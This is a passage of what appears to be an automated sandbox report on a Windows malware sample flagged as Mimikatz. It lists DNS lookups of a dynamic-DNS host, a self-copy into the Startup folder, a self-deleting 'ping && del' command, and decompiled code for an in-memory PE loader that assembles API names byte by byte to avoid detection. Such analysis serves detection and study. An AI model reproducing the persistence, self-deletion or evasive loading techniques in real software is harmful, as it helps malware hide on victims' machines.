Feb 22, 2021 20:42:52.586776018 CET	53	55016	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:53.885593891 CET	64345	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:53.943073034 CET	53	64345	8.8.8.8	192.168.2.5
Feb 22, 2021 20:43:09.285339117 CET	57128	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:43:09.334151983 CET	53	57128	8.8.8.8	192.168.2.5
Feb 22, 2021 20:43:32.359483004 CET	54791	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:43:32.411156893 CET	53	54791	8.8.8.8	192.168.2.5
Feb 22, 2021 20:43:47.758420944 CET	50463	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:43:48.057722092 CET	53	50463	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 22, 2021 20:42:00.736221075 CET	192.168.2.5	8.8.8.8	0x6780	Standard query (0)	s2010218.f3322.net	A (IP address)	IN (0x0001)
Feb 22, 2021 20:42:53.885593891 CET	192.168.2.5	8.8.8.8	0xc566	Standard query (0)	s2010218.f3322.net	A (IP address)	IN (0x0001)
Feb 22, 2021 20:43:47.758420944 CET	192.168.2.5	8.8.8.8	0x6914	Standard query (0)	s2010218.f3322.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 22, 2021 20:42:01.060415983 CET	8.8.8.8	192.168.2.5	0x6780	No error (0)	s2010218.f3322.net	58.218.67.253	A (IP address)	IN (0x0001)
Feb 22, 2021 20:42:53.943073034 CET	8.8.8.8	192.168.2.5	0xc566	No error (0)	s2010218.f3322.net	58.218.67.253	A (IP address)	IN (0x0001)
Feb 22, 2021 20:43:48.057722092 CET	8.8.8.8	192.168.2.5	0x6914	No error (0)	s2010218.f3322.net	58.218.67.253	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: OII9x4FeW7.exe PID: 3604 Parent PID: 5616

General

Start time:	20:41:58
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\OII9x4FeW7.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\OII9x4FeW7.exe'
Imagebase:	0x400000
File size:	409600 bytes
MD5 hash:	FF7D3B6003C9058E40AE38A6A7EFE40C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Ogxog.exe PID: 6188 Parent PID: 3604

General

Start time:	20:41:59
Start date:	22/02/2021
Path:	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe
Wow64 process (32bit):	true
Commandline:	'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe'
Imagebase:	0x400000
File size:	409600 bytes
MD5 hash:	FF7D3B6003C9058E40AE38A6A7EFE40C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mimikatz_1, Description: Yara detected Mimikatz, Source: 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 77%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6204 Parent PID: 3604

General

Start time:	20:41:59
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\Desktop\OII9X4~1.EXE > nul
Imagebase:	0x330000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6268 Parent PID: 6204

General

Start time:	20:42:01
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PING.EXE PID: 6312 Parent PID: 6204

General

Start time:	20:42:01
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 2 127.0.0.1
Imagebase:	0xee0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: OII9x4FeW7.exe PID: 3604 Parent PID: 5616 OII9x4FeW7.exeCOMMON

Executed Functions

Function 0045C790, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 75%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				void* _t17;
				signed int _t27;
				intOrPtr _t29;
				signed int _t35;
				void* _t38;
				intOrPtr _t50;

				_t45 = __edi;
				_push(0xffffffff);
				_push(0x45b568);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_push(__edi);
				_v28 = _t50 - 0x58;
				_t15 = GetVersion();
				 *0x4606ac = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x4606a8 = _t35;
				 *0x4606a4 = _t35 << 8;
				 *0x4606a0 = _t15 >> 0x10;
				_t17 = E0045D408(_t35 << 8, 1);
				_pop(_t38);
				if(_t17 == 0) {
					E0045C8BD(0x1c);
					_pop(_t38);
				}
				if(E0045D1C5() == 0) {
					E0045C8BD(0x10);
					_pop(_t38);
				}
				_v8 = 0;
				E0045D009();
				 *0x460d58 = GetCommandLineA();
				 *0x460690 = E0045CED7(); // executed
				E0045CC8A(); // executed
				E0045CBD1();
				E0045C8E1();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E0045CB79();
				_t54 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_t29 = E0045C73E(_t38, _t54, GetModuleHandleA(0), 0, _v104, _t27); // executed
				_v100 = _t29;
				E0045C90E(_t29);
				_v108 =  *((intOrPtr*)( *_v24));
				return E0045CA01(_t45, _t54,  *((intOrPtr*)( *_v24)), _v24);
			}

0x0045c790
0x0045c793
0x0045c795
0x0045c79a
0x0045c7a5
0x0045c7a6
0x0045c7b2
0x0045c7b3
0x0045c7b6
0x0045c7c0
0x0045c7c8
0x0045c7ce
0x0045c7d9
0x0045c7e2
0x0045c7e9
0x0045c7ee
0x0045c7f1
0x0045c7f5
0x0045c7fa
0x0045c7fa
0x0045c802
0x0045c806
0x0045c80b
0x0045c80b
0x0045c80e
0x0045c811
0x0045c81c
0x0045c826
0x0045c82b
0x0045c830
0x0045c835
0x0045c83a
0x0045c841
0x0045c84c
0x0045c84f
0x0045c853
0x0045c85d
0x0045c855
0x0045c855
0x0045c855
0x0045c86b
0x0045c870
0x0045c874
0x0045c880
0x0045c88c

APIs

GetVersion.KERNEL32 ref: 0045C7B6

Part of subcall function 0045D408: HeapCreate.KERNEL32(00000000,00001000,00000000,0045C7EE,00000001), ref: 0045D419
Part of subcall function 0045D408: HeapDestroy.KERNEL32 ref: 0045D458

GetCommandLineA.KERNEL32 ref: 0045C816
GetStartupInfoA.KERNEL32(?), ref: 0045C841
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0045C864

Part of subcall function 0045C8BD: ExitProcess.KERNEL32 ref: 0045C8DA

Strings

83d, xrefs: 0045C81C

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID: 83d
API String ID: 2057626494-1804447051
Opcode ID: 8bba840476d63f0bb722fd5c288938af137cc4d34447c4d606bfe545a1ca87a5
Instruction ID: c35b9dc727815e3def391897aa1f97c403b1516358bbf2be7613d25110c55fcc
Opcode Fuzzy Hash: 8bba840476d63f0bb722fd5c288938af137cc4d34447c4d606bfe545a1ca87a5
Instruction Fuzzy Hash: 2C2196B1C40745AED714BFB5DC86B6E7BA4EF4470AF10012FFD05AA2A2EB7C4444CA59

Uniqueness

Uniqueness Score: -1.00%

Function 0045BD5A, Relevance: 64.7, APIs: 3, Strings: 40, Instructions: 189
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0045BD5A(void* __ecx, void* __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				signed char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				signed char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				signed char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				void* __ebx;
				intOrPtr* _t106;
				void* _t108;
				intOrPtr _t110;
				void* _t112;
				void* _t114;
				intOrPtr _t115;
				void* _t118;
				void* _t119;
				intOrPtr _t123;
				intOrPtr* _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				intOrPtr* _t131;
				void* _t135;
				signed int _t137;
				signed int _t138;
				intOrPtr _t143;
				void* _t144;
				intOrPtr _t157;
				void* _t158;
				intOrPtr* _t159;

				_v36 = _v36 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_push( &_v64);
				_push( &_v48);
				_push(0);
				_v48 = 0x4b;
				_v47 = 0x45;
				_v46 = 0x52;
				_v45 = 0x4e;
				_v44 = 0x45;
				_v43 = 0x4c;
				_v42 = 0x33;
				_v41 = 0x32;
				_v40 = 0x2e;
				_v39 = 0x64;
				_v38 = 0x6c;
				_v37 = 0x6c;
				_v64 = 0x56;
				_v63 = 0x69;
				_v62 = 0x72;
				_v61 = 0x74;
				_v60 = 0x75;
				_v59 = 0x61;
				_v58 = 0x6c;
				_v57 = 0x41;
				_v56 = 0x6c;
				_v55 = 0x6c;
				_v54 = 0x6f;
				_v53 = 0x63;
				_v8 = E0045BAB0( &_v48, _t129, __ecx, __edx);
				_v66 = _v66 & 0x00000000;
				_v80 = 0x47;
				_push( &_v80);
				_t36 =  &_v48; // 0x4b
				_push(_t36);
				_push(0);
				_v79 = 0x65;
				_v78 = 0x74;
				_v77 = 0x50;
				_v76 = 0x72;
				_v75 = 0x6f;
				_v74 = 0x63;
				_v73 = 0x65;
				_v72 = 0x73;
				_v71 = 0x73;
				_v70 = 0x48;
				_v69 = 0x65;
				_v68 = 0x61;
				_v67 = 0x70;
				_v16 = E0045BAB0(_t36, _t129, __ecx, __edx);
				_v23 = _v23 & 0x00000000;
				_v32 = 0x48;
				_push( &_v32);
				_t55 =  &_v48; // 0x4b
				_push(_t55);
				_push(0);
				_v31 = 0x65;
				_v30 = 0x61;
				_v29 = 0x70;
				_v28 = 0x41;
				_v27 = 0x6c;
				_v26 = 0x6c;
				_v25 = 0x6f;
				_v24 = 0x63;
				_t106 = E0045BAB0(_t55, _t129, __ecx, __edx);
				_t64 =  &_a4; // 0x4d
				_t158 =  *_t64;
				_v20 = _t106;
				if( *_t158 != 0x5a4d) {
					L11:
					return 0;
				}
				_t131 =  *((intOrPtr*)(_t158 + 0x3c)) + _t158;
				if( *_t131 != 0x4550) {
					goto L11;
				}
				_t108 = VirtualAlloc( *(_t131 + 0x34),  *(_t131 + 0x50), 0x2000, 4);
				_v12 = _t108;
				if(_t108 != 0) {
					L4:
					_t110 = _v20(_v16(0, 0x14));
					_t76 =  &_v12; // 0x4d
					_t135 =  *_t76;
					 *((intOrPtr*)(_t110 + 0xc)) = 0;
					 *((intOrPtr*)(_t110 + 8)) = 0;
					 *((intOrPtr*)(_t110 + 0x10)) = 0;
					 *(_t110 + 4) = _t135;
					_v20 = _t110;
					VirtualAlloc(_t135,  *(_t131 + 0x50), 0x1000, 4);
					_t85 =  &_v12; // 0x4d, executed
					_t112 = VirtualAlloc( *_t85,  *(_t131 + 0x54), 0x1000, 4);
					_t137 =  *((intOrPtr*)(_t158 + 0x3c)) +  *(_t131 + 0x54);
					_t138 = _t137 >> 2;
					memcpy(_t112, _t158, _t138 << 2);
					_t114 = memcpy(_t158 + _t138 + _t138, _t158, _t137 & 0x00000003);
					_t90 =  &_a4; // 0x4d
					_t143 =  *_t90;
					_t159 = _v20;
					_t92 =  &_v12; // 0x4d
					_t157 =  *_t92;
					_t149 =  *((intOrPtr*)(_t143 + 0x3c));
					_t115 = _t114 +  *((intOrPtr*)(_t143 + 0x3c));
					 *_t159 = _t115;
					 *((intOrPtr*)(_t115 + 0x34)) = _t157;
					E0045BF74(_t143,  *((intOrPtr*)(_t143 + 0x3c)), _t169, _t143, _t131, _t159); // executed
					_t118 = _t157 -  *(_t131 + 0x34);
					_t170 = _t118;
					if(_t118 != 0) {
						E0045C22D(_t159, _t118);
						_pop(_t143);
					}
					_t119 = E0045C2A7(_t143, _t149, _t170, _t159); // executed
					_t171 = _t119;
					_pop(_t144);
					if(_t119 == 0) {
						L10:
						E0045C520(_t144, _t149, _t174, _t159);
						goto L11;
					} else {
						E0045C0A1(_t144, _t149, _t171, _t159); // executed
						_pop(_t144);
						_t123 =  *((intOrPtr*)( *_t159 + 0x28));
						if(_t123 == 0) {
							L13:
							return _t159;
						}
						_t125 = _t123 + _t157;
						if(_t125 == 0) {
							goto L10;
						}
						_t126 =  *_t125(_t157, 1, 0); // executed
						_t174 = _t126;
						if(_t126 != 0) {
							 *((intOrPtr*)(_t159 + 0x10)) = 1;
							goto L13;
						}
						goto L10;
					}
				}
				_t128 = _v8(0,  *(_t131 + 0x50), 0x2000, 4);
				_t169 = _t128;
				_v12 = _t128;
				if(_t128 == 0) {
					goto L11;
				}
				goto L4;
			}

0x0045bd61
0x0045bd65
0x0045bd6e
0x0045bd74
0x0045bd75
0x0045bd76
0x0045bd7a
0x0045bd7e
0x0045bd82
0x0045bd86
0x0045bd8a
0x0045bd8e
0x0045bd92
0x0045bd96
0x0045bd9a
0x0045bd9e
0x0045bda2
0x0045bda6
0x0045bdaa
0x0045bdae
0x0045bdb2
0x0045bdb6
0x0045bdba
0x0045bdbe
0x0045bdc2
0x0045bdc6
0x0045bdca
0x0045bdce
0x0045bdd2
0x0045bddb
0x0045bdde
0x0045bde5
0x0045bde9
0x0045bdea
0x0045bded
0x0045bdee
0x0045bdef
0x0045bdf3
0x0045bdf7
0x0045bdfb
0x0045bdff
0x0045be03
0x0045be07
0x0045be0b
0x0045be0f
0x0045be13
0x0045be17
0x0045be1b
0x0045be1f
0x0045be28
0x0045be2b
0x0045be32
0x0045be36
0x0045be37
0x0045be3a
0x0045be3b
0x0045be3c
0x0045be40
0x0045be44
0x0045be48
0x0045be4c
0x0045be50
0x0045be54
0x0045be58
0x0045be5c
0x0045be61
0x0045be61
0x0045be67
0x0045be6f
0x0045bf66
0x00000000
0x0045bf66
0x0045be78
0x0045be80
0x00000000
0x00000000
0x0045be93
0x0045be98
0x0045be9b
0x0045beb6
0x0045bebd
0x0045bec0
0x0045bec0
0x0045bec3
0x0045bec6
0x0045bec9
0x0045bed4
0x0045beda
0x0045bede
0x0045bee7
0x0045beea
0x0045bef2
0x0045bef7
0x0045befa
0x0045bf01
0x0045bf03
0x0045bf03
0x0045bf06
0x0045bf09
0x0045bf09
0x0045bf0d
0x0045bf11
0x0045bf14
0x0045bf16
0x0045bf19
0x0045bf23
0x0045bf23
0x0045bf26
0x0045bf2a
0x0045bf30
0x0045bf30
0x0045bf32
0x0045bf37
0x0045bf39
0x0045bf3a
0x0045bf5f
0x0045bf60
0x00000000
0x0045bf3c
0x0045bf3d
0x0045bf44
0x0045bf45
0x0045bf4a
0x0045bf6d
0x00000000
0x0045bf6d
0x0045bf4c
0x0045bf50
0x00000000
0x00000000
0x0045bf59
0x0045bf5b
0x0045bf5d
0x0045bf6a
0x00000000
0x0045bf6a
0x00000000
0x0045bf5d
0x0045bf3a
0x0045bea8
0x0045beab
0x0045bead
0x0045beb0
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,?,?,?,?,00000000), ref: 0045BE93
VirtualAlloc.KERNEL32(Main,?,00001000,00000004,?,?,?,?,?,?,?,00000000), ref: 0045BEDE
VirtualAlloc.KERNEL32(Main,?,00001000,00000004,?,?,?,?,?,?,?,00000000), ref: 0045BEEA

Strings

o, xrefs: 0045BDFF
c, xrefs: 0045BE03
H, xrefs: 0045BE32
p, xrefs: 0045BE44
V, xrefs: 0045BDA6
l, xrefs: 0045BDCA
Main, xrefs: 0045BE61, 0045BF03, 0045BF13
A, xrefs: 0045BE48
H, xrefs: 0045BE13
Main, xrefs: 0045BEC0, 0045BEE7, 0045BF09, 0045BEDD
r, xrefs: 0045BDFB
l, xrefs: 0045BE50
s, xrefs: 0045BE0F
t, xrefs: 0045BDB2
e, xrefs: 0045BDEF
c, xrefs: 0045BDD2
p, xrefs: 0045BE1F
r, xrefs: 0045BDAE
l, xrefs: 0045BE4C
A, xrefs: 0045BDC2
o, xrefs: 0045BDCE
t, xrefs: 0045BDF3
KERNEL32.dll, xrefs: 0045BD6F
o, xrefs: 0045BE54
P, xrefs: 0045BDF7
e, xrefs: 0045BE17
a, xrefs: 0045BE40
s, xrefs: 0045BE0B
l, xrefs: 0045BDBE
KERNEL32.dll, xrefs: 0045BDEA, 0045BDED
l, xrefs: 0045BDC6
e, xrefs: 0045BE07
u, xrefs: 0045BDB6
G, xrefs: 0045BDE5
VirtualAlloc, xrefs: 0045BD6A
a, xrefs: 0045BDBA
a, xrefs: 0045BE1B
e, xrefs: 0045BE3C
c, xrefs: 0045BE58
i, xrefs: 0045BDAA

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$AddressHandleModuleProc
String ID: A$A$G$H$H$KERNEL32.dll$KERNEL32.dll$Main$Main$P$V$VirtualAlloc$a$a$a$c$c$c$e$e$e$e$i$l$l$l$l$l$o$o$o$p$p$r$r$s$s$t$t$u
API String ID: 2994196730-12738437
Opcode ID: d2ea042641b0d28da5f9d7895672fc1727b8f8b35758acbad4d21e71866a9d81
Instruction ID: 6e07818d61c326b52828e8a590f93f1ad9cfa648c3b3d6220b1b368cdc7f6c02
Opcode Fuzzy Hash: d2ea042641b0d28da5f9d7895672fc1727b8f8b35758acbad4d21e71866a9d81
Instruction Fuzzy Hash: 79814471D08288EEEB11CBA8C884BDEBFF59F15709F084099E940B6292C7BE5549C779

Uniqueness

Uniqueness Score: -1.00%

Function 0045BAB0, Relevance: 54.3, APIs: 4, Strings: 27, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
GetProcAddress.KERNEL32(00000000), ref: 0045BB38
GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48
GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

Strings

l, xrefs: 0045BAF7
A, xrefs: 0045BB2B
LoadLibr, xrefs: 0045BB42
E, xrefs: 0045BADF
E, xrefs: 0045BAD3
2, xrefs: 0045BAEB
N, xrefs: 0045BADB
r, xrefs: 0045BB23
d, xrefs: 0045BAF3
r, xrefs: 0045BB1B
a, xrefs: 0045BB07
l, xrefs: 0045BAFB
a, xrefs: 0045BB1F
., xrefs: 0045BAEF
L, xrefs: 0045BB0F
L, xrefs: 0045BAFF
R, xrefs: 0045BAD7
3, xrefs: 0045BAE7
L, xrefs: 0045BAE3
LoadLibr, xrefs: 0045BAC6, 0045BACA
d, xrefs: 0045BB0B
i, xrefs: 0045BB13
Libr, xrefs: 0045BB4C
o, xrefs: 0045BB03
y, xrefs: 0045BB27
K, xrefs: 0045BACE
b, xrefs: 0045BB17

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.246498988.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.246502480.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246550937.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.246555004.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.246558259.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: .$2$3$A$E$E$K$L$L$L$Libr$LoadLibr$LoadLibr$N$R$a$a$b$d$d$i$l$l$o$r$r$y
API String ID: 1646373207-713136220
Opcode ID: ab11df402e6262a6cd0bd32f4206eccbc3d47516eb2c55da4dfc699759f1ff03
Instruction ID: 5a3198b695a9dee0d5a40146d2940be610bb7fc64b86859fd665e7280c72d510
Opcode Fuzzy Hash: ab11df402e6262a6cd0bd32f4206eccbc3d47516eb2c55da4dfc699759f1ff03
Instruction Fuzzy Hash: F721F050D082CDE9EF0296A8C8087EEBFA55F12348F084099D68466293C3FE5658C7BA

Uniqueness

Uniqueness Score: -1.00%

Function 0045F88E, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0045F88E(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, char _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t84;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x45b928);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x460884; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0045FAB2(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x460884; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x46087c; // 0x0
								_a28 = _t82;
							}
							_t16 =  &_a32; // 0x4609e4
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~( *_t16) & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E0045E860(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E0045E860(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					_t84 = LCMapStringW(0, 0x100, 0x45b920, _t90, ??, ??); // executed
					if(_t84 == 0) {
						if(LCMapStringA(0, 0x100, 0x45b91c, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x460884 = 2;
							goto L5;
						}
					} else {
						 *0x460884 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x0045f891
0x0045f893
0x0045f898
0x0045f8a3
0x0045f8a4
0x0045f8ab
0x0045f8b1
0x0045f8b6
0x0045f8bc
0x0045f904
0x0045f907
0x0045f90f
0x0045f915
0x0045f916
0x0045f916
0x0045f919
0x0045f921
0x0045f943
0x00000000
0x0045f949
0x0045f94c
0x0045f94e
0x0045f953
0x0045f953
0x0045f95e
0x0045f963
0x0045f973
0x0045f975
0x0045f97a
0x00000000
0x0045f980
0x0045f980
0x0045f98b
0x0045f990
0x0045f995
0x0045f998
0x0045f9b4
0x00000000
0x0045f9cf
0x0045f9e1
0x0045f9e3
0x0045f9e8
0x00000000
0x0045f9ea
0x0045f9ee
0x0045fa30
0x0045fa3f
0x0045fa44
0x0045fa47
0x0045fa49
0x0045fa4c
0x0045fa66
0x00000000
0x0045fa80
0x0045fa83
0x0045fa84
0x0045fa85
0x0045fa8b
0x0045fa8e
0x0045fa87
0x0045fa87
0x0045fa88
0x0045fa88
0x0045faa1
0x0045faa5
0x00000000
0x00000000
0x00000000
0x00000000
0x0045faa5
0x0045f9f0
0x0045f9f3
0x0045faab
0x0045faab
0x00000000
0x00000000
0x00000000
0x0045f9f3
0x0045f9ee
0x0045f9e8
0x0045f9b4
0x0045f97a
0x0045f923
0x0045f935
0x0045f935
0x0045f8be
0x0045f8be
0x0045f8bf
0x0045f8c2
0x0045f8d0
0x0045f8d8
0x0045f8f4
0x0045fa1c
0x0045fa1c
0x0045f8fa
0x0045f8fa
0x00000000
0x0045f8fa
0x0045f8da
0x0045f8da
0x00000000
0x0045f8da
0x0045f8d8
0x0045fa24
0x0045fa2f

APIs

LCMapStringW.KERNEL32(00000000,00000100,0045B920,00000001,00000000,00000000,751470F0,004609E4,?,?,?,0045FD02,?,?,?,00000000), ref: 0045F8D0
LCMapStringA.KERNEL32(00000000,00000100,0045B91C,00000001,00000000,00000000,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045F8EC
LCMapStringA.KERNEL32(?,?,?,0045FD02,?,?,751470F0,004609E4,?,?,?,0045FD02,?,?,?,00000000), ref: 0045F935
MultiByteToWideChar.KERNEL32(?,F,?,0045FD02,00000000,00000000,751470F0,004609E4,?,?,?,0045FD02,?,?,?,00000000), ref: 0045F96D
MultiByteToWideChar.KERNEL32(00000000,00000001,?,0045FD02,?,00000000,?,?,0045FD02,?), ref: 0045F9C5
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0045FD02,?), ref: 0045F9DB
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,0045FD02,?), ref: 0045FA0E
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,0045FD02,?), ref: 0045FA76

Strings

F, xrefs: 0045F95E, 0045F969

Memory Dump Source

Source File: 00000001.00000002.246541425.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

